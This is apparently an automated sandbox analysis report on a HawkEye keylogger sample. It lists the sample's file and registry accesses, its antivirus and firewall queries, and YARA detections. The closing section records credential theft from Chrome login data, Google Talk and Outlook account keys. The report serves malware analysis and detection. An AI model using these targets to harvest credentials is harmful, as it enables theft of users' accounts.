            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_0041604B GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 19_2_0040724C memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00407674 GetVersionExW,
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: InstallUtil.exe, 0000000C.00000002.602019864.0000000001013000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

            Stealing of Sensitive Information:

            barindex
            Yara detected HawkEye KeyloggerShow sources
            Source: Yara matchFile source: 12.2.InstallUtil.exe.45fa72.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.InstallUtil.exe.2b5b2a0.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.41a1cf2.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.419b8ea.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.InstallUtil.exe.408208.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.43944ca.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.419b8ea.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.41a36f7.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.43944ca.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.439c2d7.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.439a8d2.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.602473757.0000000002B31000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.455392795.000000000419B000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ypBoHI5G3x.exe PID: 6504, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6456, type: MEMORY
            Yara detected MailPassViewShow sources
            Source: Yara matchFile source: 12.2.InstallUtil.exe.3b39930.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.InstallUtil.exe.45fa72.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.InstallUtil.exe.3b39930.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.InstallUtil.exe.45fa72.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.41a1cf2.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.419b8ea.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.InstallUtil.exe.408208.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.43944ca.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.419b8ea.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.41a36f7.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.43944ca.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.439c2d7.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.439a8d2.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000013.00000002.491218277.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.606739235.0000000003B31000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.455392795.000000000419B000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ypBoHI5G3x.exe PID: 6504, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 5432, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6456, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Tries to steal Instant Messenger accounts or passwordsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
            Tries to steal Mail credentials (via file access)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
